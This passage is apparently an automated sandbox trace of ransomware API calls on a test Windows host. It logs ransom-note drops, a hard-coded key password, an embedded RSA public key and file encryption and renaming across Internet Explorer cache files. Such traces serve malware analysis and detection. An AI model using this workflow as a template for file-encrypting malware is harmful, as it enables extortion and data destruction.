FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.567] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.568] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.568] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ieflipaheadcache\\readme_back_files.htm")) returned 0xffffffff [0267.568] AreFileApisANSI () returned 1 [0267.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0267.568] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\ieflipaheadcache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.569] GetFileType (hFile=0x5d48) returned 0x1 [0267.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.621] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.621] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7eb80 [0267.622] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.622] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.622] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\dc8m5rh\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.622] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.622] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.622] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.622] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\dc8m5rh\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\dc8m5rh\\readme_back_files.htm")) returned 0xffffffff [0267.622] AreFileApisANSI () returned 1 [0267.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0267.622] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\dc8m5rh\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\dc8m5rh\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.623] GetFileType (hFile=0x5d44) returned 0x1 [0267.624] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.625] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0267.625] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7ec80 [0267.627] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.627] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0267.627] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0267.627] GetLastError () returned 0x0 [0267.627] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\imagestore.dat")) returned 0x20 [0267.628] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat", dwFileAttributes=0x80) returned 1 [0267.629] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\imagestore.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0267.629] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\imagestore.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0267.631] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat.gsg", dwFileAttributes=0x2) returned 1 [0267.631] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f252c8) returned 1 [0267.633] CryptCreateHash (in: hProv=0x2f252c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0267.633] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0267.633] CryptHashData (hHash=0x2e7f500, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.633] CryptDeriveKey (in: hProv=0x2f252c8, Algid=0x6610, hBaseData=0x2e7f500, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2e7f140) returned 1 [0267.634] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.634] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0267.634] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f24ad0) returned 1 [0267.634] CryptImportPublicKeyInfo (in: hCryptProv=0x2f24ad0, dwCertEncodingType=0x1, pInfo=0x2f2ffa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f2ffd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f2ffd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2e7f800) returned 1 [0267.634] CryptEncrypt (in: hKey=0x2e7f800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0267.634] CryptEncrypt (in: hKey=0x2e7f800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24e88*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f24e88*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0267.634] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f24e88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f24e88*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0267.635] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.656] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.656] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.667] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.667] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.667] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.668] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.668] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.668] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0267.668] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0267.668] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x114, lpOverlapped=0x0) returned 1 [0267.668] CryptEncrypt (in: hKey=0x2e7f140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x114, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x120) returned 1 [0267.668] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x120, lpOverlapped=0x0) returned 1 [0267.669] CloseHandle (hObject=0x5d3c) returned 1 [0267.669] CloseHandle (hObject=0x5d4c) returned 1 [0267.669] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\imagestore.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\imagestore.dat"), bFailIfExists=0) returned 1 [0267.672] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat", dwFileAttributes=0x0) returned 1 [0267.672] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\imagestore.dat.gsg")) returned 1 [0267.673] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\imagestore.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\imagestore.dat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\imagestore.dat.fuck")) returned 1 [0267.674] CryptDestroyHash (hHash=0x2e7f500) returned 1 [0267.674] CryptDestroyKey (hKey=0x2e7f140) returned 1 [0267.674] CryptReleaseContext (hProv=0x2f252c8, dwFlags=0x0) returned 1 [0267.674] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0267.674] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0267.674] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\readme_back_files.htm")) returned 0xffffffff [0267.674] AreFileApisANSI () returned 1 [0267.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0267.674] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\sl72e5n\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\sl72e5n\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.675] GetFileType (hFile=0x5d44) returned 0x1 [0267.675] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0267.676] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0267.677] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0267.677] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\readme_back_files.htm")) returned 0xffffffff [0267.677] AreFileApisANSI () returned 1 [0267.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0267.677] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\imagestore\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.678] GetFileType (hFile=0x5d48) returned 0x1 [0267.678] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0267.679] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0267.679] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0267.679] GetLastError () returned 0x0 [0267.680] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat")) returned 0x20 [0267.680] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT", dwFileAttributes=0x80) returned 1 [0267.680] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0267.681] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0267.685] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT.gsg", dwFileAttributes=0x2) returned 1 [0267.686] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2f249c0) returned 1 [0267.689] CryptCreateHash (in: hProv=0x2f249c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0267.689] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0267.689] CryptHashData (hHash=0x2e7eb80, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0267.689] CryptDeriveKey (in: hProv=0x2f249c0, Algid=0x6610, hBaseData=0x2e7eb80, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7f3c0) returned 1 [0267.689] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0267.689] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0267.689] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2f253d8) returned 1 [0267.690] CryptImportPublicKeyInfo (in: hCryptProv=0x2f253d8, dwCertEncodingType=0x1, pInfo=0x2f30620*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30650*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30658*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f880) returned 1 [0267.690] CryptEncrypt (in: hKey=0x2e7f880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0267.690] CryptEncrypt (in: hKey=0x2e7f880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24c68*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2f24c68*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0267.690] WriteFile (in: hFile=0x5d44, lpBuffer=0x2f24c68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f24c68*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0267.691] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.703] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0267.703] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.732] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0267.732] CryptEncrypt (in: hKey=0x2e7f3c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) 